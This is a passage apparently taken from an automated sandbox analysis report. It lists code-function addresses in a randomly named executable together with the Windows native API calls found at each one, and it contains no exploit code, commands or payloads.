Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7266AB59 memset,wcsrchr,RtlInitUnicodeStringEx,ZwApphelpCacheControl,	0_2_7266AB59
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72644B20 TpCallbackMayRunLong,TpCallbackMayRunLong,ZwSetInformationWorkerFactory,	0_2_72644B20
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268AB20 ZwCancelTimer2,	0_2_7268AB20
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726BEB22 ZwClose,	0_2_726BEB22
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268AB30 ZwCancelWaitCompletionPacket,	0_2_7268AB30
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72676B3E RtlInitializeCriticalSectionEx,ZwDelayExecution,	0_2_72676B3E
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7271EB2B ZwOpenKey,ZwCreateKey,	0_2_7271EB2B
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72686B11 ZwAlertThreadByThreadId,	0_2_72686B11
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726BEB10 ZwClose,	0_2_726BEB10
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72642BE2 ZwOpenThreadToken,ZwSetInformationThread,ZwClose,	0_2_72642BE2
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7265DBE3 RtlImageNtHeaderEx,memcmp,ZwAreMappedFilesTheSame,	0_2_7265DBE3
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72701BE5 ZwQueryInformationProcess,RtlInitUnicodeString,ZwPowerInformation,ZwPowerInformation,ZwClose,	0_2_72701BE5
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72702BDC DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,ZwQueryVirtualMemory,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,RtlCreateHeap,	0_2_72702BDC
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72663BD0 RtlDosSearchPath_Ustr,ZwQueryAttributesFile,RtlFreeHeap,memcpy,memcpy,ZwQueryAttributesFile,RtlFreeHeap,RtlGetFullPathName_UstrEx,RtlDosSearchPath_Ustr,RtlGetFullPathName_UstrEx,RtlDosApplyFileIsolationRedirection_Ustr,RtlDosSearchPath_Ustr,ZwClose,RtlFreeHeap,ZwClose,RtlFreeHeap,RtlFreeUnicodeString,	0_2_72663BD0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268ABA0 ZwCompareSigningLevels,	0_2_7268ABA0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726C4BBE ZwQuerySystemInformation,ZwQuerySystemInformationEx,RtlAllocateHeap,ZwQuerySystemInformationEx,RtlFindCharInUnicodeString,RtlEnterCriticalSection,memcpy,	0_2_726C4BBE
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7271EBA5 RtlAllocateHeap,ZwQueryValueKey,memcpy,RtlFreeHeap,	0_2_7271EBA5
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72642BB3 TpSetDefaultPoolMaxThreads,ZwDuplicateToken,	0_2_72642BB3
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72685B88 RtlInitUnicodeString,RtlInitUnicodeString,ZwQueryValueKey,ZwClose,ZwClose,ZwClose,RtlInitUnicodeString,ZwOpenKey,ZwEnumerateValueKey,DbgPrint,ZwDeleteValueKey,RtlDebugPrintTimes,ZwDeleteValueKey,DbgPrint,ZwClose,	0_2_72685B88
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726F5B86 ZwQueryValueKey,memmove,RtlInitUnicodeString,	0_2_726F5B86
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72650B95 ZwQueryInformationToken,ZwQueryInformationToken,RtlSidDominatesForTrust,RtlAllocateHeap,RtlCopySid,RtlFreeHeap,	0_2_72650B95
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72709B89 RtlAcquireSRWLockExclusive,ZwGetNlsSectionPtr,RtlAllocateHeap,RtlFreeHeap,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,	0_2_72709B89
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72642B9E ZwSetInformationThread,ZwClose,	0_2_72642B9E
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268B860 ZwReleaseKeyedEvent,	0_2_7268B860
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726C7866 RtlImageNtHeaderEx,ZwProtectVirtualMemory,	0_2_726C7866
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268B870 ZwReleaseWorkerFactoryWorker,	0_2_7268B870
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72642850 RtlReleaseActivationContext,LdrUnloadDll,ZwClose,RtlFreeHeap,	0_2_72642850
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7271884B RtlGetCurrentServiceSessionId,ZwTraceEvent,	0_2_7271884B
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726FF83F memset,RtlGetCurrentServiceSessionId,ZwTraceEvent,	0_2_726FF83F
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7264383B RtlAcquireSRWLockExclusive,TpSetWaitEx,RtlAllocateHeap,ZwGetCompleteWnfStateSubscription,RtlFreeHeap,	0_2_7264383B
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72713812 ZwTraceControl,RtlNtStatusToDosError,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlSetLastWin32Error,	0_2_72713812
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72676800 RtlInitializeCriticalSectionEx,RtlInitializeCriticalSectionEx,RtlGetCurrentServiceSessionId,ZwTraceEvent,	0_2_72676800
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268A800 ZwSetValueKey,	0_2_7268A800
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726D2804 RtlGetCurrentServiceSessionId,ZwTraceEvent,	0_2_726D2804
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7267E810 RtlEncodePointer,ZwQueryInformationProcess,RtlRaiseStatus,	0_2_7267E810
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268A8F0 ZwAlertThreadByThreadId,	0_2_7268A8F0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726748CB ZwAllocateVirtualMemory,RtlGetCurrentServiceSessionId,	0_2_726748CB
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_727188DF RtlGetCurrentServiceSessionId,ZwTraceEvent,	0_2_727188DF
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726FF8C0 memset,RtlGetCurrentServiceSessionId,ZwTraceEvent,	0_2_726FF8C0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7267D8A3 RtlAcquireSRWLockExclusive,RtlImageNtHeader,RtlAllocateHeap,ZwUnmapViewOfSection,ZwClose,RtlReAllocateHeap,	0_2_7267D8A3
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726438A0 TpSetWaitEx,RtlAllocateHeap,ZwGetCompleteWnfStateSubscription,RtlFreeHeap,TpSetWaitEx,	0_2_726438A0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726488B0 TpTrimPools,RtlAcquireSRWLockExclusive,RtlAcquireSRWLockShared,RtlAcquireSRWLockExclusive,ZwSetInformationWorkerFactory,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,RtlSleepConditionVariableSRW,RtlAllocateHeap,RtlAllocateHeap,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,ZwWaitForMultipleObjects,ZwClose,RtlFreeHeap,RtlFreeHeap,RtlFreeHeap,RtlReleaseSRWLockExclusive,RtlUnicodeStringToOemString,RtlUnicodeToOemN,RtlUnicodeStringToOemString,TpTrimPools,ZwClose,RtlFreeHeap,ZwClose,RtlFreeHeap,RtlUnicodeStringToOemString,RtlxUnicodeStringToOemSize,	0_2_726488B0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_727138AC ZwTraceControl,RtlNtStatusToDosError,RtlSetLastWin32Error,	0_2_727138AC
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72680888 ZwOpenKey,ZwClose,ZwClose,ZwCreateKey,RtlInitUnicodeStringEx,ZwSetValueKey,RtlInitUnicodeStringEx,ZwSetValueKey,ZwClose,	0_2_72680888
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7264B880 TpSetPoolStackInformation,ZwSetInformationWorkerFactory,	0_2_7264B880
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726FB89B RtlAcquireSRWLockExclusive,ZwAllocateVirtualMemory,RtlReleaseSRWLockExclusive,	0_2_726FB89B
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7267F892 ZwAlertThreadByThreadId,	0_2_7267F892
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726D2893 RtlGetCurrentServiceSessionId,ZwTraceEvent,	0_2_726D2893
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268A970 ZwAlpcConnectPort,	0_2_7268A970
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7264397E RtlAcquireSRWLockShared,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,RtlReleaseSRWLockExclusive,RtlFreeHeap,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwGetCompleteWnfStateSubscription,RtlFreeHeap,	0_2_7264397E
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726FC970 RtlpGetUserOrMachineUILanguage4NLS,RtlInitUnicodeString,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,ZwClose,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,ZwClose,ZwClose,	0_2_726FC970
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726D594F RtlInitUnicodeString,ZwOpenFile,ZwClose,RtlFreeHeap,RtlFreeHeap,RtlAllocateHeap,RtlInitUnicodeString,ZwQueryDirectoryFile,RtlAllocateHeap,memcpy,RtlFreeHeap,ZwClose,	0_2_726D594F
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268A940 ZwAllocateVirtualMemoryEx,	0_2_7268A940
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7271894E RtlGetCurrentServiceSessionId,ZwTraceEvent,	0_2_7271894E
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7264D930 memset,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,ZwClose,RtlFreeHeap,RtlInitUnicodeString,RtlCultureNameToLCID,RtlInitUnicodeString,RtlCultureNameToLCID,	0_2_7264D930
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7266E933 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,RtlGetCurrentServiceSessionId,ZwSetTimer2,RtlGetCurrentServiceSessionId,ZwCancelTimer2,	0_2_7266E933
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7266B93C ZwOpenFile,memcmp,ZwQueryInformationThread,TpWaitForWork,TpReleaseWork,	0_2_7266B93C
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726FC930 ZwAlertThreadByThreadId,	0_2_726FC930
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726739E6 ZwReleaseKeyedEvent,	0_2_726739E6
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_727149F7 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,memset,ZwWriteFile,	0_2_727149F7
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726869F5 RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlAllocateHeap,ZwDuplicateObject,RtlReleaseSRWLockExclusive,RtlWakeConditionVariable,RtlFreeHeap,	0_2_726869F5
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726509FA RtlAllocateHeap,ZwQueryInformationToken,RtlAllocateHeap,ZwQueryInformationToken,ZwQueryInformationToken,RtlAllocateHeap,ZwQueryInformationToken,ZwQueryInformationToken,RtlAllocateHeap,ZwQueryInformationToken,ZwOpenProcessToken,RtlAllocateHeap,ZwQueryInformationToken,ZwQueryInformationToken,RtlAllocateHeap,ZwQueryInformationToken,ZwClose,RtlFreeHeap,RtlFreeHeap,RtlFreeHeap,RtlFreeHeap,RtlFreeHeap,RtlFreeHeap,RtlFreeHeap,ZwClose,	0_2_726509FA
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726809CB ZwClose,	0_2_726809CB
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7264C9CF RtlAllocateHeap,ZwAlpcSetInformation,	0_2_7264C9CF
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726589B7 RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,ZwQueryDefaultLocale,ZwQueryDefaultLocale,RtlInitUnicodeString,RtlCultureNameToLCID,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,	0_2_726589B7
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726F5987 ZwUnmapViewOfSection,	0_2_726F5987
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7265C990 RtlImageNtHeaderEx,LdrGetProcedureAddressForCaller,RtlImageNtHeaderEx,ZwQueryVirtualMemory,RtlImageNtHeaderEx,LdrGetProcedureAddressForCaller,LdrGetProcedureAddressForCaller,RtlAddressInSectionTable,LdrGetProcedureAddressForCaller,	0_2_7265C990
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268BE60 ZwUpdateWnfStateData,	0_2_7268BE60
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268AE60 ZwCreateWorkerFactory,	0_2_7268AE60
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72649E74 ZwQueryInformationToken,RtlEqualSid,ZwQueryInformationToken,RtlAllocateHeap,ZwQueryInformationToken,RtlEqualSid,RtlFreeHeap,ZwOpenProcessToken,ZwClose,ZwClose,ZwClose,RtlFreeHeap,ZwPrivilegeCheck,	0_2_72649E74
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7267DE50 RtlDecodePointer,ZwQueryInformationProcess,RtlRaiseStatus,RtlAllocateAndInitializeSid,RtlAllocateHeap,RtlAllocateAndInitializeSid,RtlAllocateAndInitializeSid,RtlAllocateAndInitializeSid,	0_2_7267DE50
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268BE50 ZwUnsubscribeWnfStateChange,	0_2_7268BE50
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72649E20 EtwSetMark,ZwTraceEvent,RtlNtStatusToDosError,	0_2_72649E20
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7267CE34 ZwQueryAttributesFile,RtlFreeHeap,ZwClose,RtlFreeHeap,	0_2_7267CE34
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268AE30 ZwCreateWaitCompletionPacket,	0_2_7268AE30
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268BE30 ZwUnlockVirtualMemory,	0_2_7268BE30
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726DBE30 RtlReleasePrivilege,ZwAdjustPrivilegesToken,ZwSetInformationThread,ZwClose,RtlFreeHeap,ZwClose,RtlFreeHeap,	0_2_726DBE30
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72700E11 ZwTraceEvent,	0_2_72700E11
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7266EEE0 RtlSetThreadWorkOnBehalfTicket,memcmp,ZwSetInformationThread,RtlSetThreadWorkOnBehalfTicket,	0_2_7266EEE0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72700EFB memset,RtlGetCurrentServiceSessionId,ZwTraceEvent,	0_2_72700EFB
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726F5EFB ZwOpenKey,ZwQueryValueKey,RtlEqualUnicodeString,RtlEqualUnicodeString,RtlEqualUnicodeString,ZwClose,	0_2_726F5EFB
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72642EF8 ZwWaitForAlertByThreadId,ZwWaitForAlertByThreadId,	0_2_72642EF8
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7264BEFB memset,ZwTerminateProcess,	0_2_7264BEFB
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72661ED0 RtlAcquireSRWLockExclusive,RtlDllShutdownInProgress,ZwWaitForAlertByThreadId,RtlAcquireSRWLockExclusive,ZwTerminateProcess,	0_2_72661ED0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72643EA0 RtlSetThreadSubProcessTag,RtlGetCurrentServiceSessionId,RtlSetThreadSubProcessTag,RtlGetCurrentServiceSessionId,ZwTraceEvent,	0_2_72643EA0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268BEA0 ZwWaitForKeyedEvent,	0_2_7268BEA0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72688EA0 RtlInitUnicodeString,ZwOpenKey,RtlAllocateHeap,RtlInitUnicodeString,ZwQueryValueKey,RtlFreeHeap,ZwClose,memcpy,ZwClose,	0_2_72688EA0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72700EA0 ZwTraceEvent,	0_2_72700EA0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726D8EBA ZwReadFile,ZwWaitForSingleObject,	0_2_726D8EBA
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268BEB0 ZwWaitForWorkViaWorkerFactory,	0_2_7268BEB0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72642EBF ZwCreateEvent,ZwClose,	0_2_72642EBF
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72703E96 ZwAllocateVirtualMemory,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,	0_2_72703E96
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268BE80 ZwWaitForAlertByThreadId,	0_2_7268BE80
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726F3E82 ZwQueryVirtualMemory,	0_2_726F3E82
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726D2E90 LdrAddDllDirectory,RtlDetermineDosPathNameType_U,ZwQueryAttributesFile,RtlFreeHeap,RtlAllocateHeap,memcpy,RtlAcquireSRWLockExclusive,@_EH4_CallFilterFunc@8,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlFreeHeap,LdrAddDllDirectory,	0_2_726D2E90
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72716F78 RtlGetCompressionWorkSpaceSize,RtlAllocateHeap,ZwAllocateVirtualMemory,	0_2_72716F78
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72650F6F RtlInitUnicodeString,ZwQueryLicenseValue,RtlAllocateHeap,ZwQueryLicenseValue,RtlFreeHeap,	0_2_72650F6F
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72657F74 RtlImageNtHeaderEx,ZwProtectVirtualMemory,ZwProtectVirtualMemory,	0_2_72657F74
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72685F73 ZwFreeVirtualMemory,ZwAllocateVirtualMemory,	0_2_72685F73
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726C2F40 LdrAppxHandleIntegrityFailure,RtlQueryPackageIdentityEx,memset,ZwQueryValueKey,RtlFreeHeap,ZwClose,memset,memset,RtlCaptureContext,RtlReportException,ZwTerminateProcess,	0_2_726C2F40
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72685F5A ZwQueryKey,	0_2_72685F5A
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72679F20 RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,RtlAcquireSRWLockExclusive,RtlAcquireSRWLockShared,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,ZwWaitForAlertByThreadId,	0_2_72679F20
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7266EF29 ZwAlpcSetInformation,	0_2_7266EF29
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72646F30 RtlGetPersistedStateLocation,ZwOpenKey,memcpy,RtlGetPersistedStateLocation,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,RtlAllocateHeap,ZwQueryValueKey,RtlExpandEnvironmentStrings,memcpy,ZwClose,ZwClose,RtlFreeHeap,	0_2_72646F30
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268AF00 ZwDeleteValueKey,	0_2_7268AF00
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72671F10 TpSetPoolMaxThreads,ZwSetInformationWorkerFactory,RtlGetCurrentServiceSessionId,TpSetPoolMaxThreads,	0_2_72671F10
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726ECF10 ZwAllocateVirtualMemory,ZwDuplicateObject,ZwWriteVirtualMemory,ZwTerminateThread,ZwClose,ZwFreeVirtualMemory,ZwResumeThread,ZwWaitForSingleObject,ZwClose,ZwReadVirtualMemory,	0_2_726ECF10
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72716FE7 RtlFreeHeap,ZwFreeVirtualMemory,	0_2_72716FE7
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72642FD0 RtlDestroyHeap,RtlDeleteCriticalSection,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlDestroyHeap,DbgPrint,DbgPrint,DbgPrint,RtlDebugPrintTimes,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,ZwTraceEvent,RtlGetCurrentServiceSessionId,ZwTraceEvent,	0_2_72642FD0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72685FDC RtlAppendUnicodeToString,RtlAppendUnicodeToString,RtlAppendUnicodeToString,ZwOpenKey,RtlDeleteBoundaryDescriptor,RtlFormatCurrentUserKeyPath,RtlAppendUnicodeStringToString,RtlFreeUnicodeString,ZwCreateKey,	0_2_72685FDC
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72683FD0 RtlWakeAllConditionVariable,ZwAlertThreadByThreadId,RtlWakeAllConditionVariable,	0_2_72683FD0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72684FD0 RtlExitUserThread,ZwQueryInformationThread,LdrShutdownThread,TpCheckTerminateWorker,ZwTerminateThread,RtlExitUserThread,memset,RtlEnterCriticalSection,RtlLockHeap,ZwTerminateProcess,RtlLeaveCriticalSection,RtlReportSilentProcessExit,LdrShutdownProcess,ZwTerminateProcess,RtlUnlockHeap,RtlLeaveCriticalSection,ZwTerminateThread,TpCheckTerminateWorker,ZwDuplicateObject,	0_2_72684FD0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7264DFAB RtlInitUnicodeString,ZwOpenKey,RtlpLoadUserUIByPolicy,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,RtlFreeHeap,ZwClose,ZwClose,RtlInitUnicodeString,ZwOpenKey,RtlAllocateHeap,RtlpLoadMachineUIByPolicy,ZwClose,	0_2_7264DFAB
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7264CFB4 ZwIsUILanguageComitted,ZwQueryInstallUILanguage,RtlpMuiRegFreeRegistryInfo,RtlInitUnicodeString,ZwOpenKey,ZwEnumerateKey,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,ZwClose,ZwClose,RtlpMuiRegFreeRegistryInfo,	0_2_7264CFB4
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7267BFB0 RtlSleepConditionVariableSRW,RtlReleaseSRWLockExclusive,ZwWaitForAlertByThreadId,RtlAcquireSRWLockExclusive,RtlAcquireSRWLockShared,RtlSleepConditionVariableSRW,RtlReleaseSRWLockShared,ZwWaitForAlertByThreadId,	0_2_7267BFB0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726D0FB0 ZwQuerySystemInformation,RtlInitUnicodeString,memset,ZwAlpcConnectPort,ZwAlpcSendWaitReceivePort,ZwClose,	0_2_726D0FB0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268BF80 ZwWow64DebuggerCall,	0_2_7268BF80
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7270AF81 RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,ZwTraceEvent,	0_2_7270AF81
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72700F82 ZwTraceEvent,	0_2_72700F82
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7266EF90 ZwAssociateWaitCompletionPacket,	0_2_7266EF90
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268BC60 ZwSetTimer2,	0_2_7268BC60
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7269EC60 RtlRaiseException,RtlCaptureContext,ZwRaiseException,RtlRaiseStatus,	0_2_7269EC60
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7264AC6E RtlGetThreadErrorMode,ZwQueryInformationProcess,EtwEventWriteNoRegistration,	0_2_7264AC6E
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268AC70 ZwCreateIoCompletion,	0_2_7268AC70
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72667C7D RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,	0_2_72667C7D
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7269DC20 ZwSetEvent,RtlWakeAddressAllNoFence,RtlRaiseStatus,	0_2_7269DC20
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72700C29 RtlGetCurrentServiceSessionId,ZwTraceEvent,	0_2_72700C29
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72673C00 RtlCreateHeap,memset,ZwAllocateVirtualMemory,ZwAllocateVirtualMemory,RtlGetCurrentServiceSessionId,memset,RtlInitializeCriticalSectionEx,RtlAllocateHeap,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,ZwQueryVirtualMemory,memset,ZwQueryVirtualMemory,memset,RtlCreateHeap,RtlDebugPrintTimes,memset,DbgPrint,DbgPrint,DbgPrint,RtlCreateHeap,ZwQuerySystemInformation,memset,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlDeleteCriticalSection,	0_2_72673C00
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72717C04 RtlAcquireSRWLockExclusive,ZwSetInformationWorkerFactory,RtlReleaseSRWLockExclusive,	0_2_72717C04
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72688C16 RtlAllocateHeap,RtlInitUnicodeString,ZwOpenKey,RtlAllocateHeap,RtlInitUnicodeString,ZwQueryValueKey,RtlFreeHeap,ZwClose,RtlFreeHeap,	0_2_72688C16
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7264ACF0 RtlFreeUserStack,ZwFreeVirtualMemory,	0_2_7264ACF0
